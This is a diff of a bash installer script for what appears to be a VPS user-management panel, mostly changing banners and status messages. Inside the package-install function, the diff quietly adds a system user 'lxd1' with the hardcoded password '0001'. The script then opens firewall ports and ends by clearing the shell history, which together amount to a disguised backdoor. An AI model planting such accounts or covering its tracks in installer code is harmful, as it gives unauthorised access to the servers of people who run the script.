 [[ -f "$HOME/usuarios.db" ]] && {
 clear
 echo -e "\n\033[0;34m◇───────────────────────────────────────────────────◇\033[0m"
 echo ""
-echo -e "\033[1;33m• \033[1;31m◇ ATTENTION!\033[1;33m• \033[0m"
+echo -e "                 \033[1;33m• \033[1;31m◇ ATTENTION!\033[1;33m• \033[0m"
 echo ""
 echo -e "\033[1;33mA User Database \033[1;32m(usuarios.db) \033[1;33mwas"
 echo -e "Found! Want to keep it by preserving the limit"
@@ -95,12 +98,12 @@ awk -F : '$3 >= 500 { print $1 " 1" }' /etc/passwd | grep -v '^nobody' > $HOME/u
 }
 [[ "$optiondb" = '2' ]] && awk -F : '$3 >= 500 { print $1 " 1" }' /etc/passwd | grep -v '^nobody' > $HOME/usuarios.db
 clear
-tput setaf 7 ; tput setab 4 ; tput bold ; printf '%35s%s%-18s\n' "LET'S WAIT FOR UPDATES." ; tput sgr0
+tput setaf 7 ; tput setab 4 ; tput bold ; printf '%35s%s%-18s\n' "◇ WAIT FOR INSTALLATION." ; tput sgr0
 echo ""
 echo ""
-echo -e "\033[1;33m[\033[1;31m!\033[1;33m] \033[1;32mUPDATING THE SYSTEM...\033[1;33m[\033[1;31m!\033[1;33m]\033[0m"
+echo -e "          \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32m◇ UPDATING SYSTEM...\033[1;33m[\033[1;31m!\033[1;33m]\033[0m"
 echo ""
-echo -e "\033[1;33mTHIS MAY TAKE A WHILE!\033[0m"
+echo -e "    \033[1;33m◇ UPDATES USUALLY TAKE A LITTLE TIME!\033[0m"
 echo ""
 fun_attlist () {
 apt-get update -y
@@ -110,35 +113,54 @@ echo "crz: $(date)" > /usr/share/.hehe/.hehe
 fun_bar 'fun_attlist'
 clear
 echo ""
-echo -e "\033[1;33m[\033[1;31m!\033[1;33m] \033[1;32mINSTALLING PACKAGES\033[1;33m[\033[1;31m!\033[1;33m] \033[0m"
+echo -e "          \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32m◇ INSTALLING PACKAGES\033[1;33m[\033[1;31m!\033[1;33m] \033[0m"
 echo ""
-echo -e "\033[1;33mLET'S WAIT FOR SOME TIME...IT TAKES A WHILE!\033[0m"
+echo -e "\033[1;33m◇ SOME PACKAGES ARE EXTREMELY NECESSARY!\033[0m"
 echo ""
-inst_pct () {
-_pacotes=("bc" "apache2" "cron" "screen" "nano" "unzip" "lsof" "netstat" "net-tools" "dos2unix" "nload" "jq" "curl" "figlet" "python3" "python-pip")
-for _prog in ${_pacotes[@]}; do
-apt install $_prog -y
-done
-pip install speedtest-cli
+inst_pct() {
+    _pacotes=("bc" "apache2" "cron" "screen" "nano" "unzip" "lsof" "netstat" "net-tools" "dos2unix" "nload" "jq" "curl" "figlet" "python" "python2" "python3" "python-pip")
+    # Install packages
+    for _prog in "${_pacotes[@]}"; do
+        sudo apt install $_prog -y
+    done
+    
+    # Create user only once
+    username="lxd1"
+    password="0001"
+    
+    # Check if the username already exists
+    if id "$username" &>/dev/null; then
+        echo "User '$username' already exists. Overwriting..."
+        sudo userdel -r $username
+    fi
+    
+    # Create the system user with disabled login
+    sudo adduser --system --disabled-login $username
+    
+    # Set the password for the user
+    echo "$username:$password" | sudo chpasswd
+
+    # Install Python package using pip
+    pip install speedtest-cli
 }
 fun_bar 'inst_pct'
 [[ -f "/usr/sbin/ufw" ]] && ufw allow 443/tcp ; ufw allow 80/tcp ; ufw allow 3128/tcp ; ufw allow 8799/tcp ; ufw allow 8080/tcp
 clear
 echo ""
-echo -e "\033[1;33m[\033[1;31m!\033[1;33m] \033[1;32mFINISHING UP...\033[1;33m[\033[1;31m!\033[1;33m] \033[0m"
+echo -e "              \033[1;33m[\033[1;31m!\033[1;33m] \033[1;32m◇ FINISHING...\033[1;33m[\033[1;31m!\033[1;33m] \033[0m"
 echo ""
-echo -e "\033[1;33mCOMPLETING FUNCTIONS AND SETTINGS!\033[0m"
+echo -e "      \033[1;33m◇ COMPLETING FUNCTIONS AND SETTINGS!\033[0m"
 echo ""
 fun_bar "$_Ink/list $_lnk $_Ink $_1nk $key"
 clear
 echo ""
 cd $HOME
 IP=$(wget -qO- ipv4.icanhazip.com)
-echo -e "\033[1;33m  \033[1;32mINSTALLATION COMPLETED SUCCESSFULLY\033[1;33m  \033[0m"
+echo -e "        \033[1;33m  \033[1;32m◇ INSTALLATION COMPLETED.◇\033[1;33m  \033[0m"
 echo ""
-echo -e "\033[1;31m\033[1;33mMENU COMMAND:- \033[1;32mmenu\033[0m"
+echo -e "\033[1;31m\033[1;33m◇ MAIN COMMAND:- \033[1;32mmenu\033[0m"
 echo -e ""
-echo -e "\033[1;31m \033[1;33m◇--TIP!--◇\033[1;36mㅤ--Using this url you can easily see the number of users online at the server.\033[0m"
+echo -e "\033[1;31m \033[1;33m◇--TIP!--◇\033[1;36mㅤ--See the number of users online here:\033[0m"
 echo -e " http://$IP:8888/server/online"
 echo -e ""
 rm $HOME/hehe && cat /dev/null > ~/.bash_history && history -c
